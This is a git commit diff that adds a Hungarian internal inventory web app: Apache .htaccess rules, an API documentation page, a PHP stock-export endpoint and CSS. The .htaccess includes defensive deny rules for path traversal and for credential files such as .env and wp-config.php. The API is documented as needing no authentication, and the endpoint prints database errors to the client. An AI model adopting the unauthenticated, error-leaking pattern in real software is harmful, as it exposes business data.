commit 95350b8d0508a3d4545376a5b62b210bc663a6d8 Author: kjokmjnoi Date: Thu Feb 26 14:35:27 2026 +0100 Inicial commit diff --git a/.htaccess b/.htaccess new file mode 100644 index 0000000..3e64249 --- /dev/null +++ b/.htaccess @@ -0,0 +1,44 @@ + + Header always set X-Content-Type-Options "nosniff" + Header always set X-XSS-Protection "1; mode=block" + Header always set X-Frame-Options "deny" + # Belső hálózat - cache OK + Header set Cache-Control "private, max-age=3600" + + + + + ExpiresActive On + ExpiresDefault "access plus 1 hour" + + + +RewriteEngine on + +# HTTPS erőltetés (opcionális belső hálózaton) +# RewriteCond %{HTTPS} off +# RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] + +# PHP rewrite +RewriteCond %{REQUEST_FILENAME} !-d +RewriteCond %{REQUEST_FILENAME}.php -f +RewriteRule ^(.*)$ $1.php [L] + +DirectoryIndex index.html index.php + +# CSAK külső hotlink ellen (JSON/PHP kivéve) +RewriteCond %{REQUEST_URI} !\.(php|json)$ +RewriteCond %{HTTP_REFERER} !^$ +RewriteCond %{HTTP_REFERER} !^https?://szaturnusz\.szatuna\.hu [NC] +RewriteRule \.(jpg|jpeg|png|gif|css)$ - [NC,F,L] + +# CSAK VALÓDI hibákra ErrorDocument +ErrorDocument 400 /error.php +ErrorDocument 401 /error.php +ErrorDocument 403 /error.php +ErrorDocument 404 /error.php +ErrorDocument 500 /error.php +ErrorDocument 502 /error.php +ErrorDocument 503 /error.php + +IndexIgnore *.png *.jpg *.jpeg *.json diff --git a/api/.htaccess b/api/.htaccess new file mode 100644 index 0000000..4a83574 --- /dev/null +++ b/api/.htaccess @@ -0,0 +1,52 @@ + + Header always set X-Content-Type-Options "nosniff" + Header always set X-XSS-Protection "1; mode=block" + Header always set X-Frame-Options "deny" + Header set Cache-Control "no-cache, no-store, must-revalidate" + Header set Pragma "no-cache" + Header set Expires 0 + + + + + ExpiresActive Off + + + FileETag None + Header unset ETag + Header unset Pragma + Header unset Cache-Control + Header unset Last-Modified + Header set Pragma "no-cache" + Header set Cache-Control "max-age=0, no-cache, no-store, must-revalidate" + Header set Expires "Thu, 1 Jan 1970 00:00:00 GMT" + + + +RewriteEngine on + +# PATH TRAVERSAL VÉDELEM +RewriteCond %{REQUEST_URI} (\.\./|/\.\.|\\|\0|%2e%2e) [NC] +RewriteRule .* - [F,L] + +# SENSITIVE FILES VÉDELEM (kivéve stock.php és index.php) +RewriteRule ^(wp-config\.php|\.env)$ - [F,L] + +# HTTPS erőltetés +RewriteCond %{HTTPS} off +RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] + +# PHP rewrite +RewriteCond %{REQUEST_FILENAME} !-d +RewriteCond %{REQUEST_FILENAME}.php -f +RewriteRule ^(.*)$ $1.php [L] + +DirectoryIndex index.html index.php + +# Hotlink védelem - CSAK statikus fájlok +RewriteCond %{REQUEST_URI} !\.(php|json)$ +RewriteCond %{HTTP_REFERER} !^$ +RewriteCond %{HTTP_REFERER} !^https?://(?:www\.)?zimbra\.szatuna\.hu:18821 [NC] +RewriteRule \.(jpg|jpeg|png|gif|css)$ - [NC,F,L] + +IndexIgnore *.png *.jpg *.jpeg *.json diff --git a/api/favicon.ico b/api/favicon.ico new file mode 100644 index 0000000..175982a Binary files /dev/null and b/api/favicon.ico differ diff --git a/api/index.php b/api/index.php new file mode 100644 index 0000000..c0ba72b --- /dev/null +++ b/api/index.php @@ -0,0 +1,629 @@ + + + + + + API Dokumentáció + + + +
+
+

API Dokumentáció

+

Verzió 1.0.0 | Utolsó frissítés: 2025. december 29.

+
+
+ +
+ + +
+ +
+

Áttekintés

+

A Szaturnusz rendszerhez tartozó Web API-k leírását tekintheti meg.

+
+ Alap URL: https://zimbra.szatuna.hu:18821 +
+
+ + +
+

Hitelesítés

+

Az API-k jelenleg nem igényelnek hitelesítést. Az összes végpont nyilvánosan elérhető.

+
+ + +
+

GET Végpontok

+

Teljes raktárkészlet lekérdezése

+
+
+ GET + /stock.php +
+
Az összes raktárban rendelkezésre álló cikkszám lekérdezése. Tartalmazza a szokványos raktárat, a fóliás raktárat és a szett cikkszámokat. Csak pozitív készletű cikkszámok kerülnek visszaadásra.
+ +

Lekérdezési paraméterek

+ + + + + + + + + + + + + + + + + + + + + + + +
ParaméterTípusStátuszLeírás
formatstringopcionálisVálasz formátuma: json, csv, xml. Alapértelmezett: json
item_idstringopcionálisSzűrés egy konkrét cikkszámra. Pontos egyezés szükséges
+ +
+
Sikeres válasz (JSON)
+ 200 OK +
[ + { + "item_id": "PART001", + "total_amount": 42 + }, + { + "item_id": "PART002", + "total_amount": 15 + }, + { + "item_id": "PART003+PART004", + "total_amount": 8 + } +]
+
+
+
+ + +
+

Válasz formátumok

+

Az API-k támogatják a JSON, CSV és XML kimeneti formátumokat. Válassz a format paraméterrel.

+ +

JSON formátum (alapértelmezett)

+
+
Kérés
+
/stock.php?format=json
+
Válasz
+
[ + { + "item_id": "PART001", + "total_amount": 42 + } +]
+
+ +

CSV formátum

+
+
Kérés
+
/stock.php?format=csv
+
Válasz
+
item_id,total_amount +PART001,42 +PART002,15 +PART003+PART004,8
+
+ +

XML formátum

+
+
Kérés
+
/stock.php?format=xml
+
Válasz
+
<?xml version="1.0"?> +<root> + <item> + <item_id>PART001</item_id> + <total_amount>42</total_amount> + </item> +</root>
+
+
+ + +
+

Hibák és státuszkódok

+

Az API-k lekérdezési hibái közvetlenül a kimenetre íródnak. Az alábbi HTTP státuszkódok lehetségesek:

+ +
+
+
200 OK
+
A kérés sikeres. Az eredmények JSON/CSV/XML formátumban kerülnek visszaadásra
+
+
+
500 Internal Server Error
+
Adatbázis kapcsolat vagy lekérdezési hiba. Az error üzenet az stdout-ra íródik
+
+
+ +

Paraméter validáció

+

Az API alapértelmezés szerint figyelmen kívül hagyja az érvénytelen paramétereket:

+
    +
  • format – Érvénytelen érték esetén JSON alapértelmezett
  • +
  • item_id – Nem tárolt item_id esetén üres tömb kerül visszaadásra
  • +
+
+
+
+ + + + diff --git a/api/stock.php b/api/stock.php new file mode 100644 index 0000000..d797d7c --- /dev/null +++ b/api/stock.php @@ -0,0 +1,97 @@ + $item1, 'item2' => $item2]; +} + +$format = isset($_GET['format']) ? strtolower($_GET['format']) : 'json'; +$itemIdFilter = isset($_GET['item_id']) ? trim($_GET['item_id']) : null; + +$sql = "SELECT s.item_id, s.saleable_quantity +FROM statistics_daily s +INNER JOIN pr_parameters p ON s.item_id = p.item_id +WHERE p.data_status IN (1, -1) +"; + +$result = $conn->query($sql); + +if (!$result) { + die('Lekérdezési hiba: ' . $conn->error); +} + +$data = []; +$dataMap = []; + +while ($row = $result->fetch_assoc()) { + $data[] = $row; + $dataMap[$row['item_id']] = $row['saleable_quantity']; +} + +if ($itemIdFilter !== null) { + $data = array_filter($data, function($row) use ($itemIdFilter) { + return $row['item_id'] === $itemIdFilter; + }); + $data = array_values($data); +} + +switch ($format) { + case 'csv': + header('Content-Type: text/csv; charset=utf-8'); + header('Content-Disposition: attachment; filename="export.csv"'); + $output = fopen('php://output', 'w'); + if (!empty($data)) { + fputcsv($output, array_keys($data[0])); + foreach ($data as $row) { + fputcsv($output, $row); + } + } + fclose($output); + break; + + case 'xml': + header('Content-Type: application/xml; charset=utf-8'); + $xml = new SimpleXMLElement(''); + foreach ($data as $row) { + $item = $xml->addChild('item'); + foreach ($row as $key => $value) { + $item->addChild($key, htmlspecialchars($value)); + } + } + echo $xml->asXML(); + break; + + case 'json': + default: + header('Content-Type: application/json; charset=utf-8'); + echo json_encode($data, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT); + break; +} + +$conn->close(); +?> diff --git a/cloc.exe b/cloc.exe new file mode 100644 index 0000000..6c25a0f Binary files /dev/null and b/cloc.exe differ diff --git a/css/aszf.css b/css/aszf.css new file mode 100644 index 0000000..323f8c6 --- /dev/null +++ b/css/aszf.css @@ -0,0 +1,36 @@ +body { + width: 100%; + height: 100%; + margin: 0px; + background: #111; +} +::-webkit-scrollbar-track +{ + -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3); + background-color: #ecf0f1; +} + +::-webkit-scrollbar +{ + width: 5px; + background-color: #ecf0f1; +} + +::-webkit-scrollbar-thumb +{ + background-color: #7f8c8d; + border-radius: 20px; +} +.content { + font-family: monospace; + padding: 30px; + color: #95a5a6; +} +.content p { + color: #7f8c8d; +} +strong { + font-size: 16px; + color: #95a5a6; + font-weight: bold; +} diff --git a/css/custom_panel.css b/css/custom_panel.css new file mode 100644 index 0000000..b12d767 --- /dev/null +++ b/css/custom_panel.css @@ -0,0 +1,546 @@ + +/*--- Custom CSS ---*/ + +.menu .menubtn.exit:hover { + background: #c0392b; +} + +.loadingBG img.svg { + width: 400px; + height: 400px; + animation: float 3s ease-in-out infinite; +} + +.menubtn p { + font-size: 14px; +} + +@keyframes float { + 0% { transform: translateY(0); } + 50% { transform: translateY(-10px); } + 100% { transform: translateY(0); } +} + +.redtext { + background: linear-gradient(90deg, #ff0000, #910101, #ff0000); + background-size: 200% 100%; + -webkit-background-clip: text; + -webkit-text-fill-color: transparent; + text-shadow: 0px 0px 20px rgba(206, 0, 0, 0.4); + animation: wave 2s linear infinite; +} + +@keyframes wave { + 0% { background-position: 200% 50%; } + 100% { background-position: 0% 50%; } +} + +p.label { + margin: 5px 0px; + font-weight: bold; +} + +.wapp input.nameInput { + width: calc(100% - 16px); + max-width: unset; + margin-top: 0px; + margin-bottom: 15px; + font-size: 16px; + font-weight: normal; +} + +.window .wapp { + padding-left: 23px; + padding-right: 23px; + width: calc(100% - 46px); +} + +div#qrcode { + -webkit-user-drag: none; + user-drag: none; + -webkit-user-select: none; + -moz-user-select: none; + -ms-user-select: none; + user-select: none; + pointer-events: none; +} + +select { + max-width: 165px; +} + +button { + color: var(--bgcolor); + background: var(--panelcolor); + border: 0px; +} + +.boxpc button, .box2 button, .box3 button, .box4 button { + color: var(--panelcolor); + background: var(--bgcolor); +} + +/* Products */ + +.productbox { + display: block; + padding: 3px 20px; +} + +.productbox p:first-of-type { + display: inline-block; + font-weight: bold; + float: left; + margin: 0px; +} +.productbox p:first-of-type::after { + content: ":"; +} +.productbox p:last-of-type { + color: var(--panelcolor); + display: inline-block; + min-width: 50px; + margin: 0px 0px 0px 6px; +} +.productbox p:last-of-type:focus { + outline: none; + transition: 0.2s; + box-shadow: 0px 1px 1px var(--panelcolor) !important; + background-color: color-mix(in srgb, var(--panelcolor) 8%, #ffffff 90%); + border-radius: 6px 6px 0px 0px; +} +.productbox p:last-of-type:empty { + opacity: 0.2; + outline: none; + box-shadow: 0px 1px 0px var(--panelcolor); +} + +/* Helpcursor */ +.helpcursor .helptext { + width: 350px; + text-align: left; + left: unset; + right: 0; + margin-right: 30px; +} + +/* Version info */ +.VersionData { + z-index: 9999; + position: fixed; + left: 5px; + bottom: 5px; + -webkit-user-select: none; + -moz-user-select: none; + -ms-user-select: none; + user-select: none; +} +.VersionData a { + opacity: 0.4; + margin: 0px; + font-size: 12px; + cursor: pointer; + color: #333333; +} +.VersionData a:hover { + opacity: 0.8; +} + +/* Category TAB */ +.category-tabs { + display: grid; + grid-template-columns: repeat(3, 1fr); + gap: 15px; + margin-top: 30px; + margin-bottom: 30px; +} + +.category-tab { + background: white; + border: 2px solid #ddd; + border-radius: 5px; + padding: 20px; + cursor: pointer; + transition: all 0.3s ease; + text-align: center; +} + +.category-tab:hover { + border-color: var(--panelcolor); +} + +.category-tab.active { + border-color: var(--panelcolor); + background-color: color-mix(in srgb, var(--panelcolor) 10%, #ffffff 90%);; +} + +.category-tab-icon { + position: absolute; +} +.category-tab-icon img { + width: 44px; + height: 44px; +} + +.category-tab-desc { + font-size: 12px; + opacity: 0.6; + margin-top: 5px; +} + +.cat-tab.form-section { + background: white; + border-radius: 5px; + padding: 30px; + display: none; +} + +.cat-tab.form-section.active { + display: block; +} + +.cat-tab .form-title { + font-size: 18px; + font-weight: 600; + color: var(--panelcolor); + margin-bottom: 5px; +} + +.cat-tab .form-desc { + font-size: 13px; + margin-bottom: 25px; + padding-bottom: 15px; + border-bottom: 1px solid #eee; + opacity: 0.6; +} + +.cat-tab .form-row { + min-height: 80px; + display: grid; + grid-template-columns: 1fr 1fr 1fr; + gap: 20px; + margin-bottom: 20px; +} + +.cat-tab .form-row.full { + grid-template-columns: 1fr; +} + +.cat-tab .form-group { + display: flex; + flex-direction: column; +} + +.cat-tab label { + font-weight: 600; + font-size: 13px; + margin-bottom: 8px; + color: #333; +} + +.cat-tab .required::after { + content: "*"; + color: #c0392b; + margin-left: 3px; +} + +.cat-tab textarea { + resize: vertical; + min-height: 80px; +} + +.cat-tab select { + max-width: 218px; +} + +.cat-tab .form-hint { + font-size: 11px; + opacity: 0.5; + margin-top: 4px; +} + +.cat-tab .form-actions { + display: flex; + gap: 10px; + margin-top: 25px; + justify-content: flex-end; +} + +.cat-tab .info-banner { + background-color: color-mix(in srgb, var(--panelcolor) 10%, #ffffff 90%);; + border-left: 4px solid var(--panelcolor); + padding: 12px 15px; + border-radius: 4px; + margin-bottom: 20px; + font-size: 12px; + color: var(--panelcolor); +} + +.cat-tab .info-banner strong { + display: block; + margin-bottom: 3px; +} + +@media (max-width: 992px) { + .category-tabs { + grid-template-columns: 1fr; + } + .cat-tab .form-row { + grid-template-columns: 1fr 1fr; + } +} + +/* Stat Style */ +.statistics { + padding: 16px; +} + +.statistics .container { + max-width: 1400px; + margin: 0 auto; +} + +.statistics .header { + margin-bottom: 24px; +} + +.statistics .header h1 { + margin: 0 0 5px 0; + font-size: 24px; + font-weight: 600; +} + +.statistics .header p { + margin: 0; + opacity: 0.8; + font-size: 14px; +} + +.statistics .sections { + display: grid; + grid-template-columns: repeat(auto-fit, minmax(380px, 1fr)); + gap: 16px; +} + +.statistics .section-group { + background: var(--toppanel); + border-radius: 5px; + overflow: hidden; +} + +.statistics .section-group-title { + font-family: Arial, Helvetica, sans-serif; + background: var(--panelcolor); + color: var(--bgcolor); + padding: 12px 16px; + font-size: 16px; + font-weight: bold; + margin: 0; +} + +.statistics .section { + padding: 12px 16px; + border-bottom: 1px solid rgb(211, 220, 228); +} + +.statistics .section:last-child { + border-bottom: none; +} + +.statistics .section-name { + font-family: Arial, Helvetica, sans-serif; + font-size: 13px; + font-weight: bold; + margin: 0 0 12px 0; +} + +.statistics .article-row { + display: grid; + grid-template-columns: 70px 1fr; + gap: 12px; + align-items: center; + margin-bottom: 5px; + font-size: 13px; +} + +.statistics .article-row:last-child { + margin-bottom: 0; +} + +.statistics .article-stats { + display: grid; + grid-template-columns: 1fr 1fr; + gap: 5px; +} + +.statistics .stat-block { + display: flex; + align-items: baseline; + gap: 4px; +} + +.statistics .stat-label { + font-size: 11px; + opacity: 0.8; + min-width: 18px; +} + +.statistics .stat-value { + font-weight: 600; + font-size: 14px; +} + +.statistics .stat-value.right { + color: var(--panelcolor); +} + +.statistics .stat-value.left { + color: var(--panelcolor); +} + +.statistics .boxing-row { + display: flex; + flex-direction: column; + gap: 5px; + margin-bottom: 5px; + padding: 5px; + background: var(--bgcolor); + border-radius: 5px; +} + +.statistics .boxing-row:last-child { + margin-bottom: 0; +} + +.statistics .boxing-header { + display: grid; + grid-template-columns: 70px 1fr; + gap: 12px; + align-items: center; +} + +.statistics .boxing-header .article-code { + font-weight: bold; +} + +.statistics .boxing-progress { + display: flex; + align-items: center; + gap: 5px; +} + +.statistics .progress-bar { + flex: 1; + height: 6px; + background-color: rgb(211, 220, 228); + border-radius: 3px; + overflow: hidden; +} + +.statistics .progress-fill { + height: 100%; + background: var(--panelcolor); + transition: width 0.3s ease; +} + +.statistics .progress-text { + font-size: 11px; + opacity: 0.8; +} + +.statistics .boxing-label { + font-size: 11px; + opacity: 0.8; +} + +.statistics .separator { + color: rgb(211, 220, 228); + font-weight: 300; +} + + +.statistics .section-articles { + display: grid; + grid-template-columns: repeat(auto-fit, minmax(140px, 1fr)); + gap: 12px; +} + +.statistics .article-card { + background: var(--bgcolor); + border: 1px solid rgb(211, 220, 228); + border-radius: 5px; + padding: 12px; + text-align: center; + display: flex; + flex-direction: column; + gap: 5px; +} + +.statistics .article-card-code { + font-weight: bold; +} + +.statistics .article-card-stats { + display: flex; + justify-content: center; + gap: 12px; + font-size: 12px; +} + +.statistics .article-card-stat { + display: flex; + align-items: center; + gap: 3px; +} + +.statistics .article-card-value { + font-size: 13px; + opacity: 0.8; +} + +.statistics .article-card-value.right { + color: var(--panelcolor); + opacity: 1; +} + +.statistics .article-card-value.left { + color: var(--panelcolor); + opacity: 1; +} + + +/* Production */ + +.kanban-card { + display: grid; + grid-template-columns: 1fr auto; + align-items: center; +} + +.kanban-card .card-title { + grid-column: 1; + align-items: center; + justify-content: flex-start; + display: flex; + margin-bottom: 8px; + font-size: 16px; +} + +.kanban-card .card-subtitle { + font-size: 14px; + grid-column: 1; + display: flex; + justify-content: space-between; + align-items: center; + margin-bottom: 0; +} + +.kanban-card .card-button { + grid-column: 2; + grid-row: 1 / 3; + display: flex; + align-items: center; + justify-content: center; + flex-shrink: 0; + margin-left: 12px; +} diff --git a/css/error.css b/css/error.css new file mode 100644 index 0000000..b3960ed --- /dev/null +++ b/css/error.css @@ -0,0 +1,64 @@ +@import url('https://fonts.googleapis.com/css?family=Poppins:100,200,300,400,500,600,700,800,900'); +* +{ + margin: 0; + padding: 0; + box-sizing: border-box; + font-family: 'Poppins', sans-serif; +} +body +{ + background: linear-gradient(45deg, #8500ff, #5acaff); + height: 100vh; +} +#container +{ + position: absolute; + width: 100%; + height: 100%; + display: flex; + justify-content: center; + align-items: center; + background: url('https://image.kjokmjnoi.hu/image.php?path=/p404'), #151729; + box-shadow: 0 15px 30px rgba(0, 0, 0, .5); +} +#container .content +{ + max-width: 600px; + text-align: center; +} +#container .content h2 +{ + font-size: 18vw; + color: #fff; + line-height: 1em; +} +#container .content h4 +{ + position: relative; + font-size: 1.5em; + margin-bottom: 20px; + color: #111; + background: #fff; + font-weight: 300; + padding: 10px 20px; + display: inline-block; +} +#container .content p +{ + color: #fff; + font-size: 1.2em; +} +#container .content a +{ + cursor: pointer; + position: relative; + display: inline-block; + padding: 10px 25px; + background: #2ecc71; + color: #fff; + text-decoration: none; + margin-top: 25px; + border-radius: 25px; + border-bottom: 4px solid #27ae60; +} diff --git a/css/login.css b/css/login.css new file mode 100644 index 0000000..ee9c317 --- /dev/null +++ b/css/login.css @@ -0,0 +1,405 @@ +@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300&display=swap'); + +:root { + --inputcolor: #11334a; + --submitcolor: #11334a; + --submitcolorhover: #1e5b85; + + --errorcolor: #ff2424; + + --bgcolorlight: #37adfa; + --bgcolordark: #2980b9; + --infobglight: 17, 51, 74; /* RGB */ + --infobgdark: 17, 51, 74; /* RGB */ +} + +html { + width: 100%; + height: 100%; + font-family: 'Poppins', sans-serif; + font-size: 14px; + line-height: 1.7; + color: #f3f3f3; +} + +.bg { + position: fixed; + width: 100%; + height: 100%; + background: linear-gradient(to bottom left, var(--bgcolorlight), var(--bgcolordark)); + top: 0; + left: 0; + z-index: -1; +} + +.protection { + min-width: 800px; + min-height: 550px; + position: fixed; + width: 50%; + height: calc(50% + 103.6px); + bottom: calc(50% + 103.6px); + left: 50%; + transform: translate(-50%, calc(50% + 103.6px)); + z-index: 997; + border-radius: 4px; + box-shadow: 1px 5px 10px #333333; + background: #ffffff; +} + +.protection p { + font-size: 14px; + width: 100%; + text-align: center; + font-weight: bold; + color: #333333; +} + +.protection p.result { + color: #33cccc; +} + +.protection img { + width: calc(100% - 30px); + height: calc(100% - 133.6px); + margin: 15px; + object-fit: contain; + object-position: center; + -webkit-user-drag: none; + -khtml-user-drag: none; + -moz-user-drag: none; + -o-user-drag: none; + user-drag: none; +} + +.protection.active { + animation: protect_active 3s; + bottom: -51%; +} + +@keyframes protect_active { + 0% { + bottom: calc(50% + 103.6px); + } + 80% { + bottom: calc(50% + 103.6px); + } + 90% { + bottom: calc(60% + 103.6px); + } + 100% { + bottom: -51%; + } +} +.protection .hidden { + display: none; + visibility: hidden; +} + +.protection .hp { + position: fixed; + bottom: -1000px; + left: -1000px; +} + +.container { + max-width: 780PX; + max-height: 550px; + min-width: 550px; + min-height: 340px; + width: 80%; + height: 40%; + border-radius: 2px; + box-shadow: 8px 8px 5px rgb(22 2 6 / 30%); + transform: translate(-50%, -50%); + top: 50%; + left: 50%; + position: absolute; + background: linear-gradient(135deg, rgba(255,255,255,0.2) 0%,rgba(0,0,0,0.2) 100%); + line-height: 1; +} +input { + opacity: 0.7; + border: 0; + background: var(--inputcolor); + display: block; + margin: 20px auto; + padding: 14px 10px; + width: 40%; + outline: none; + color: white; + transition: 0.25s; + border-radius: 2px; +} +input[type = "submit"] { + border: 0; + background: var(--submitcolor); + display: block; + margin: 20px auto; + padding: 14px 10px; + width: 30%; + outline: none; + color: white; + transition: 0.25s; + cursor: pointer; +} + +input.pass { + -webkit-text-security: disc !important; +} + +input[type = "submit"]:hover{ + background: var(--submitcolorhover); +} + +input[type = "submit"]:disabled { + cursor: not-allowed; +} + +.container i { + position: absolute; +} + +p.errortext { + font-weight: bold; + color: var(--errorcolor); + text-align: center; + text-shadow: 1px 1px 2px #333; + font-size: 16px; + letter-spacing: 0.5px; +} + +.icon { + margin: 12.5px; + margin-left: 361.7px; + color: #f0f0f0; + text-align: center; + width: 18px; + height: 18px; +} +.icon svg { + width: 18px; + height: 18px; +} +.login { + padding-top: 50px; + float: left; + height: 100%; + width: 70%; +} + +.info { + float: right; + width: 30%; + height: 100%; + text-align: center; + background: linear-gradient(rgba(var(--infobglight), 0.8), rgba(var(--infobgdark), 0.8)); + opacity: 0.9; + margin: 0; + box-shadow: 0px 5px 5px rgb(22 2 6 / 30%); +} +.mobilelogin { + visibility: hidden; + position: absolute; +} + +/* 6 digit OTC */ + +.otcdiv { + min-width: 800px; + min-height: 300px; + position: fixed; + width: 50%; + height: calc(20% + 103.6px); + bottom: calc(50% + 103.6px); + left: 50%; + transform: translate(-50%, calc(50% + 103.6px)); + z-index: 999; + border-radius: 4px; + box-shadow: 1px 5px 10px #333333; + background: #f5f5f5; + color: var(--inputcolor); + text-align: center; + padding: 30px; + visibility: visible; + display: unset; + animation: floatup 0.4s ease; +} + +.otcdiv.deactive { + display: none; + visibility: hidden; +} +.otcdiv:not(.deactive) + .bg { + z-index: 998; + background: linear-gradient(to bottom left, color-mix(in srgb, var(--bgcolorlight) 70%, black), color-mix(in srgb, var(--bgcolordark) 70%, black)); +} + + +input.otc { + margin-top: 40px; + display: block; + color: var(--inputcolor); + font-weight: bold; + border: #333333bd 1px solid; + font-family: "Consolas", ui-monospace, "Menlo", "Source Code Pro", monospace; + font-size: 2em; + + --gap: 8px; + width: calc(6 * (var(--gap) + 1ch)); + letter-spacing: var(--gap); + padding: var(--gap); + padding-right: 0; + border-radius: calc(var(--gap) / 2); + background: linear-gradient(to right, #dddddd 1px 1ch, transparent 0) content-box center left / calc(1ch + var(--gap)) 1em repeat-x; +} +.otcdiv input[type = "submit"] { + bottom: 15px; + position: absolute; + left: 35%; +} +.otcdiv h1 { + font-size: 28px; +} +.otcdiv p { + font-size: 14px; +} + +@keyframes floatup { + 0% { + bottom: -75px; + } + 100% { + bottom: calc(50% + 103.6px); + } +} + +@media (max-width:1230px) { + .container { + height: 600px; + max-width: 700px; + min-height: 700px; + width: 700px; + } + .mobilelogin h1 { + font-size: 60px; + visibility: visible; + position: relative; + text-align: center; + } + .mobilelogin { + padding-top: 35px; + width: 100%; + } + .form { + margin-top: 200px; + } + .icon { + margin: 14.5px; + margin-left: 523.5px; + width: 36px; + height: 36px; + } + .icon svg { + width: 36px; + height: 36px; + } + .login { + width: 100%; + height: 100%; + padding-top: 0px; + } + .info { + visibility: hidden; + position: absolute; + } + h1 { + font-size: 40pt; + } + p { + font-size: 25px; + } + .login input[type = "text"],.login input[type = "password"]{ + margin: 20px auto; + padding: 18px 14px; + width: 60%; + color: white; + font-size: 25px; + } + .login input[type = "submit"]{ + margin: 20px auto; + padding: 18px 14px; + width: 50%; + font-size: 25px; + } +} + +/* Wave anim */ + +section { + opacity: 0.5; + position: fixed; + width: 100%; + overflow: hidden; + height: 40%; + bottom: 0; + left: 0; + z-index: -1; +} +section .wave { + position: absolute; + bottom: 0; + left: 0; + width: 100%; + height: 100px; + background: url("data:image/png;base64,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